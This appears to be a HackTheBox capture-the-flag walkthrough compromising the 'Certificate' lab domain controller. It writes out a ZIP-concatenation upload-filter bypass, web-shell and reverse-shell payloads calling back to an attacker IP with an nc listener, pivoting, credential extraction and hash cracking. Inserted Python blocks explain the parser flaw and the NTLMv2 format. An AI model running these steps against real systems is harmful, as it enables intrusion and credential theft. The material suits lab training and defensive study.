HackTheBox | Certificate

In this walkthrough, I demonstrate how I obtained complete ownership of Certificate on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Hard Challenge

Nmap Results

# Nmap 7.95 scan initiated Mon Jun  2 13:23:46 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.89.103
Nmap scan report for 10.129.89.103
Host is up (0.016s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-03 01:24:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49722/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-03T01:25:47
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  2 13:26:28 2025 -- 1 IP address (1 host up) scanned in 161.60 seconds
My CTF Methodology
In this post, I examine the steps I take to approach a typical CTF in the form of a vulnerable target (also known as boot2root), and elaborate on steps at each phase.

💡
Don't miss an opportunity to find some breadcrumbs and interesting information in the initial nmap scan output. We can see references to the certificate.htb domain as well as the DC01 hostname in the output of multiple protocols. So, let's add that to our /etc/hosts file.
echo -e '10.129.89.103\t\tDC01.certificate.htb certificate.htb' | sudo tee -a /etc/hosts





Service Enumeration

TCP/53

Zone transfer failed
No additional subdomains found via bruteforce



TCP/389

Anonymous bind is rejected; the error indicates a bind credential is required



TCP/445

smbclient -N -L //DC01.certificate.htb
No anonymous share listing



TCP/88

Kerberos Pre-Auth User... | 0xBEN | Notes

First, I use the word list from option A and I notice they seem to have a first.l username convention. So, I alter the script in option D to output usernames in that format and enumerate again.

kerbrute userenum -d certificate.htb \
--dc DC01.certificate.htb -t 200 \
-o kerbrute.log ./kerberos_users.txt
AS-REP Roasting | 0xBEN | Notes
Sadly though, no AS-REP hashes



TCP/80

Walking the Application

Walking the “happy path” · Pwning OWASP Juice Shop
ℹ️
We don't know anything about the web application at the moment, so for now, we'll just click around on the page; testing different links and putting expected inputs in any input fields. We just want to understand for now what certain things do.
When presented with the opportunity to register an account, we should take it and see if it opens any additional attack surface
Register both a teacher and student. Also the messaging seems to indicate there may be some social engineering (e.g. XSS)
Potential username on the contact form
Messaging indicates it will be reviewed, so again, worth testing XSS
Enroll in a course and you can submit files at various milestones
💡
Since it's an Apache server running PHP, if we can find an upload filter bypass, we ought to be able to get code execution on the server.
At this point, we've tested all of the clickable areas and input points that a normal user would be expected to use. Thus, we have concluded the initial walk of the application, and should go back and review our Burp / proxy request history as an initial first step to uncover potential findings.



Penetration Testing

What We Know So Far

Users and Roles

  • We can register as both a teacher and student
    • Seems to indicate different permissions tiers, features
    • Teacher accounts are disabled, a bypass may exist

Potential Social Engineering

  • Contact form may indicate some kind of XSS
  • There is a file upload feature on courses
    • Requires a .zip file that contains:
      • .pdf
      • .docx
      • .pptx
      • .xlsx
    • Says submission will be reviewed by instructor
    • May be able to use a maldoc to capture a NetNTLMv2 hash

Potential Injection Attacks

  • Search forms don't appear to be functional
  • Login form may be vulnerable to SQLi

Content Filter Bypass

  • Test file upload feature with valid file and observe the behavior
  • Might be able to find a bypass to upload .php and get code execution



Attempting to Steal NetNTLM Hash

Since the application takes a .zip submission, I thought that CVE-2025-24054 would be a good exploit for the job, but it seems that the underlying process inspecting the .zip is not explorer.exe. If I had to guess, the workflow is going to look like:

  1. Unzip archive
  2. Inspect document

So, whichever document is used in step 2 is the one that will need the payload.

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)

I used this to generate a .docx to test with for now

After generating the .docx, I added it to pwn.zip and uploaded it. But, I was pleasantly surprised to find something else...

💡
Hovering over the HERE hyperlink, you can see the file extension of the original file upload is preserved!

http://certificate.htb/static/uploads/687afaf3514c41e99518f9af6a8d830b/pwn-remotetemplate.docx



Attempting to Bypass File Upload Filters

Some of the tricks I tried weren't working for me:

  • Changing the Content-Type header in the multipart form
  • Appending magic bytes to a malicious PHP file in the .zip archive
  • Symbolic links in the .zip archive
  • Different file extension escaping techniques such as %00, ;, appending a ., etc

Given the parameters, the upload has to be a .zip archive, and the files inside the archive have to be .pdf, .docx, .pptx, or .xlsx.

The web app filters on the file extension of the initial upload (it must be .zip) and on the MIME type of the file(s) within the archive.

Doing some research on bypassing MIME types in .zip archives, I came across the .zip concatenation technique.

WinRAR and ZIP File Exploits: This ZIP File Hack Could Let Malware Bypass Your Antivirus
echo 'hello world' > nice.docx
echo '<?php phpinfo(); ?>' > test.php
zip nice.zip nice.docx
zip test.zip test.php
cat nice.zip test.zip > exploit.zip

Concatenate the two .zip archives into one

The file is still recognized as a .zip archive
💡
The logic here is that different .zip parsers and extraction utilities handle a concatenated archive differently. A .zip is located from its End of Central Directory record, which is found by scanning backwards from the end of the file; a parser that honours that record (libzip, PHP's ZipArchive, unzip) lists only the second (last) archive's entries, whereas a parser that walks local file headers forward from offset 0 stops at the first archive's central directory and lists only the first. By putting nice.zip first, the filter sees only nice.docx, while the component that actually extracts the upload writes out the .php file from the second archive.
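To make the parser discrepancy concrete, here is an added example (my own code, not the post's and not the web app's, whose source we never see): it builds the same nice.zip + test.zip polyglot in memory, lists it the two ways a server can, and puts a naive "check whatever you can walk from offset 0" filter beside a hardened one that rejects concatenated archives. The filter logic is a model of the behaviour observed above and keys on extension rather than MIME type for brevity.

```python
"""Why ZIP concatenation slips past a 'first archive only' filter.

Added example for this page; it models the observed behaviour and is not the
web app's real code. Entry names and contents below are constructed.
"""
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"   # local file header signature
EOCD_SIG = b"PK\x05\x06"    # end of central directory record signature
ALLOWED = (".pdf", ".docx", ".pptx", ".xlsx")


def make_zip(entries):
    """Build a ZIP in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def names_from_central_directory(blob):
    """What a parser that honours the EOCD sees (Python zipfile, libzip/PHP
    ZipArchive, unzip): the EOCD is located by scanning backwards from the end
    of the file, so with two archives glued together only the LAST one is listed."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def names_from_local_headers(blob):
    """What a streaming parser that walks local file headers from offset 0 sees.
    It stops at the first non-local-header signature, i.e. at the FIRST archive's
    central directory, so the second archive is never reached."""
    names, off = [], 0
    while blob[off:off + 4] == LOCAL_SIG:
        (_ver, flags, _method, _time, _date, _crc,
         csize, _usize, nlen, elen) = struct.unpack_from("<HHHHHIIIHH", blob, off + 4)
        names.append(blob[off + 30:off + 30 + nlen].decode("utf-8"))
        if flags & 0x08:  # sizes live in a trailing data descriptor; not handled here
            break
        off += 30 + nlen + elen + csize
    return names


def naive_filter_allows(blob):
    """Model of the weak check: validate only the names a start-of-file walk yields."""
    seen = names_from_local_headers(blob)
    return bool(seen) and all(n.lower().endswith(ALLOWED) for n in seen)


def hardened_filter_allows(blob):
    """Reject polyglots outright: exactly one EOCD, and the local-header view must
    agree with the central-directory view. Then validate every entry the
    extractor will actually write."""
    try:
        cd_names = names_from_central_directory(blob)
    except zipfile.BadZipFile:
        return False
    if blob.count(EOCD_SIG) != 1:
        return False
    if sorted(cd_names) != sorted(names_from_local_headers(blob)):
        return False
    return bool(cd_names) and all(n.lower().endswith(ALLOWED) for n in cd_names)


def build_polyglot():
    """nice.zip + test.zip, exactly what `cat nice.zip test.zip > exploit.zip` produces."""
    nice = make_zip({"nice.docx": b"hello world\n"})
    evil = make_zip({"test.php": b"<?php phpinfo(); ?>\n"})
    return nice, evil, nice + evil


if __name__ == "__main__":
    nice, evil, exploit = build_polyglot()
    print("filter (local headers) sees :", names_from_local_headers(exploit))
    print("extractor (central dir) sees:", names_from_central_directory(exploit))
    print("naive filter allows exploit :", naive_filter_allows(exploit))
    print("hardened filter allows it   :", hardened_filter_allows(exploit))
    print("hardened filter allows nice :", hardened_filter_allows(nice))
```

The hardened check rejects an archive whose local-header walk and central-directory listing disagree, or that carries more than one EOCD record; a production version would also have to parse data-descriptor entries (general purpose flag bit 3), where the walk above stops. The underlying fix is simpler still: validate the entries the extractor itself yields, never a separate parse of the same bytes.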





Exploit

PHP Web Shell

php-reverse-shell/src/web/simple_php_web_shell_get_v2.php at master · ivan-sincek/php-reverse-shell
PHP shells that work on Linux OS, macOS, and Windows OS. - ivan-sincek/php-reverse-shell
wget https://github.com/ivan-sincek/php-reverse-shell/raw/refs/heads/master/src/web/simple_php_web_shell_get_v2.php -O webshell.php
zip pwn.zip webshell.php
cat nice.zip pwn.zip > exploit.zip

Upload exploit.zip and browse to webshell.php under the upload directory (the same http://certificate.htb/static/uploads/<id>/ path pattern seen earlier for the .docx)



PHP Reverse Shell

php-reverse-shell/src/reverse/php_reverse_shell.php at master · ivan-sincek/php-reverse-shell
wget https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/refs/heads/master/src/reverse/php_reverse_shell.php -O rev.php
sed -i "s/Shell('127.0.0.1', 9000)/Shell('10.10.14.164', 443)/g" rev.php

Change the listener IP and port to your VPN IP and desired port

zip rev.zip rev.php
cat nice.zip rev.zip > exploit.zip
sudo rlwrap nc -lnvp 443

Start a TCP listener, upload exploit.zip, and browse to rev.php under the upload directory to trigger the callback





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 DC01
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00430-70398-04661-AA694
Original Install Date:     11/3/2024, 12:03:50 PM
System Boot Time:          6/5/2025, 7:35:32 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,824 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,380 MB
Virtual Memory: In Use:    1,419 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    certificate.htb
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.206.23
                                 [02]: fe80::daf:b9af:15cc:f09d
                                 [03]: dead:beef::ee8b:460f:a6ba:984f
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.    

Current User

USER INFORMATION
----------------

User Name             SID                                          
===================== =============================================
certificate\xamppuser S-1-5-21-515537669-4223687196-3249690583-1130


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                         Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.    



Users and Groups

Local Users

(none; the host is a domain controller, so there is no local SAM and all accounts are domain accounts)

Local Groups

(none, for the same reason; the BUILTIN groups appear under Domain Groups below)

Domain Users

Administrator
Guest
krbtgt
Kai.X
Sara.B
John.C
Aya.W
Nya.S
Maya.K
Lion.SK
Eva.F
Ryan.K
akeder.kh
kara.m
Alex.D
karol.s
saad.m
xamppuser    

Domain Groups

Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
Domain CRA Managers
Finance
HR
Marketing
Help Desk
Domain Storage Managers    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::ee8b:460f:a6ba:984f
   Link-local IPv6 Address . . . . . : fe80::daf:b9af:15cc:f09d%7
   IPv4 Address. . . . . . . . . . . : 10.129.206.23
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%7
                                       10.129.0.1    



Processes and Services

Interesting Processes

Name        : cmd.exe
Owner       : CERTIFICATE\xamppuser
CommandLine : C:\Windows\system32\cmd.exe  /K C:\xampp\apache_start.bat
    
Name        : cmd.exe
Owner       : CERTIFICATE\xamppuser
CommandLine : C:\Windows\system32\cmd.exe  /K C:\xampp\mysql_start.bat
    
Name        : mysqld.exe
Owner       : CERTIFICATE\xamppuser
CommandLine : mysql\bin\mysqld  --defaults-file=mysql\bin\my.ini --standalone



Scheduled Tasks

Interesting Scheduled Tasks

TaskName : Start Web App
User     : xamppuser
Action   : "C:\Program Files\Automation Scripts\start-webapp.bat"     



Interesting Files

C:\xampp\htdocs\certificate.htb\db.php

<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>    





Privilege Escalation

Exploring MySQL

We found a database credential in the db.php file. I tried spraying the password with nxc along with the list of users collected from the domain, but no valid credential was found. So, we'll need to use some port forwarding to reach tcp/3306 on the target.

Port Forwarding

Pivoting with Ligolo-ng | 0xBEN | Notes

We need to transfer agent.exe to the target. For this purpose, the impacket-smbserver method will work just fine.

SMB | 0xBEN | Notes
  1. Start impacket-smbserver with credentials
  2. Map the SMB server on the target
  3. Transfer Ligolo-ng agent.exe binary
  4. Start Ligolo proxy on Kali
  5. Execute Ligolo agent on the Windows client
sudo impacket-smbserver -smb2support -username 'secretuser' -password 'secretpass' EvilShare $PWD
net use Z: \\10.10.14.164\EvilShare /user:secretuser 'secretpass'

Map the SMB share to drive Z:

Copy-Item Z:\agent.exe $env:USERPROFILE

Copy the Ligolo-ng agent binary to the target

sudo ./proxy -selfcert --selfcert-domain pwnz -laddr 10.10.14.164:443

Start the Ligolo proxy on Kali; it prints the fingerprint of its self-signed certificate, which the agent is pinned to below

cd $env:USERPROFILE
Start-Job -ScriptBlock { C:\Users\xamppuser\agent.exe -accept-fingerprint 4F439D961D8BABA4F771C9136FE708FB51C3FBF784F3A34538FDD18BDC639158 -connect 10.10.14.164:443 }

Connect the agent to the proxy from the reverse shell via a background job

sudo ip route add 240.0.0.1/32 dev ligolo

Add a route to 240.0.0.1, Ligolo-ng's special address for ports bound to the agent's loopback (this assumes the ligolo tun interface is up and the session has been started from the proxy console)


Connect to the DBMS

mysql --skip-ssl -h 240.0.0.1 -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD'

Connect to the database through the Ligolo tunnel

MariaDB [(none)]> show databases;
MariaDB [(none)]> use certificate_webapp_db;
MariaDB [certificate_webapp_db]> show tables;
MariaDB [certificate_webapp_db]> select * from users;
sara.b is the admin and is a domain user, so let's try and crack the hash. It is bcrypt ($2y$) with a cost factor of only 4, so a wordlist attack against it is cheap.

Crack the Hash

echo '$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6' > hash
john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 hash
nxc smb DC01.certificate.htb -d certificate.htb -u ad_users.txt -p 'Blink182' --continue-on-success
Nice! Now, let's get to work on some LDAP enumeration to see what we can do with this...



LdapDomainDump

ldapdomaindump -u 'CERTIFICATE.HTB\sara.b' -p 'Blink182' -o ldd DC01.certificate.htb
open ldd/domain_users_by_group.html
Two potentially interesting groups in the output:
  • The entire Help Desk group can WinRM
  • Help Desk is also among the RDP users, so the group appears to carry some interesting privileges



BloodHound

Run SharpHound on the Target

We need to transfer the SharpHound.exe collector to the target. For this purpose, we can use the SMB server mapping from before in our reverse shell.

  1. Transfer SharpHound collector in a .zip archive
  2. Unzip on the target and run the collector
  3. Transfer the data back to Kali via SMB
zip -r sharphound.zip /usr/share/sharphound
Copy-Item Z:\sharphound.zip $env:USERPROFILE

Copy the .zip archive to the target

cd $env:USERPROFILE
Expand-Archive $env:USERPROFILE\sharphound.zip

Unzip the archive contents

& "$env:USERPROFILE\sharphound\usr\share\sharphound\SharpHound.exe" -c All

Run the collector using PowerShell

Copy-Item .\20250605201112_BloodHound.zip Z:\

Copy the .zip data from BloodHound back to Kali for analysis



Analysis of the Data

Even just starting with xamppuser, we see some interesting data relating to certificate enrollment
sara.b has an absolutely massive amount of permissions in the domain
She's also a member of the Help Desk group, which has WinRM and RDP access too
She also has GenericAll on accounts in the Domain CRA Managers group too
The members of this security group are responsible for issuing and revoking multiple certificates for the domain users



WinRM as Sara.B

evil-winrm -i DC01.certificate.htb -u 'sara.b' -p 'Blink182'
💡
From here, we repeat the post-exploitation enumeration process
Some interesting files in sara.b's Documents directory. Contents of description.txt:

The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!


PCAP Analysis

Open the PCAP with Wireshark. It is currently saved in PCAPNG format, so go to File > Save As and save it in PCAP format (or convert it from the CLI with editcap -F pcap in.pcapng out.pcap), so we can analyze it with NetworkMiner.

We can see some NTLMv2 authentication data for the Administrator user on WS-01
We can also see some Kerberos pre-authentication hashes in here as well
Extracting Secrets fro... | 0xBEN | Notes
In this screenshot we see the NTLMv2 hashes plus the Kerberos AS-REQ and AS-REP hashes; let's try to crack them



Attempt to Crack Hashes

$NETNTLMv2$WS-01$3DB684FDE8A4436C$76BA3B94054956325448475EAB7103B9$010100000000000069CFF1DA922EDB0159C89DCA95B2D6B200000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E006800740062000700080069CFF1DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$415D7CB9D106E31C$CC7ADCFFAEA628997E214927F5187619$01010000000000001574F6DA922EDB014D2184A5C2FFA38D00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008001574F6DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$4AF2949270E91BD0$E6FC561114128A4F849EDB6268C419FA$01010000000000001045E8DA922EDB01623CA486AF73EB7100000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008001045E8DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$532AE6CD16799423$E336CEAEFD01EB90006495D8B134391D$0101000000000000381D00DB922EDB01A391E84FD1BAEC8400000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E0068007400620007000800381D00DB922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$E8393B7BF095FA9D$3552F9AE0AAE4722D8AD9273E197C461$01010000000000007C26F4DA922EDB01E5F7C7EBA82B3DF600000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008007C26F4DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000

admin_ntlm.txt

john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 admin_ntlm.txt

❌ No luck cracking this one with the rockyou.txt word list.
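Before spending more cracking time on these, it is worth reading what the NTLMv2 blob (everything after the last $ in each line) actually says. The following is an added example written for this page, not code from the post, NetworkMiner or john: it builds an NTLMv2 client-challenge structure per MS-NLMP, parses it back into its AV_PAIRs, and formats the hashcat -m 5600 line. Only the FILETIME and client nonce are copied from the first hash above; the server challenge, NTProofStr, user and domain are placeholders, so the emitted line is illustrative and will not crack. The same tail is visible in every hash above: 0900 1200 followed by UTF-16 "cifs/DC01" is the MsvAvTargetName pair, i.e. the SPN that WS-01 was authenticating to.

```python
"""Build and dissect the NTLMv2 'blob' that follows the NTProofStr in a
NetNTLMv2 hash line.

Added example for this page (not from the post, NetworkMiner or john).
Layout follows MS-NLMP 2.2.2.7 / 2.2.2.1. The sample response is CONSTRUCTED;
only TIMESTAMP_FT and CLIENT_CHALLENGE are copied from the first hash above.
"""
import struct
from datetime import datetime, timedelta, timezone

AV_IDS = {0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
          3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
          6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
          9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
STRING_AVS = (1, 2, 3, 4, 5, 9)
EPOCH_DIFF = 116444736000000000  # 100 ns ticks from 1601-01-01 to 1970-01-01


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601) to an aware UTC datetime."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=(ft - EPOCH_DIFF) // 10)


def utf16(s):
    return s.encode("utf-16-le")


def build_ntlmv2_blob(timestamp_ft, client_challenge, av_pairs):
    """NTLMv2_CLIENT_CHALLENGE: RespType=1, HiRespType=1, 6 reserved bytes,
    FILETIME, 8-byte client nonce, 4 reserved bytes, AV_PAIRs, then MsvAvEOL."""
    blob = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp_ft) + client_challenge + b"\x00" * 4
    for av_id, value in av_pairs:
        blob += struct.pack("<HH", av_id, len(value)) + value
    return blob + struct.pack("<HH", 0, 0)


def parse_ntlmv2_blob(blob):
    """Return (timestamp, client_nonce, {av_name: decoded value})."""
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge blob")
    timestamp = filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0])
    client_nonce = blob[16:24]
    pairs, off = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:          # MsvAvEOL terminates the list
            break
        value = blob[off:off + av_len]
        off += av_len
        if av_id in STRING_AVS:
            value = value.decode("utf-16-le")
        elif av_id == 7:
            value = filetime_to_datetime(struct.unpack("<Q", value)[0])
        elif av_id == 6:
            value = struct.unpack("<I", value)[0]
        pairs[AV_IDS.get(av_id, f"AvId{av_id}")] = value
    return timestamp, client_nonce, pairs


def hashcat_5600(user, domain, server_challenge, nt_proof_str, blob):
    """hashcat -m 5600 / john netntlmv2 input: USER::DOMAIN:serverchallenge:NTProofStr:blob."""
    return f"{user}::{domain}:{server_challenge.hex()}:{nt_proof_str.hex()}:{blob.hex()}"


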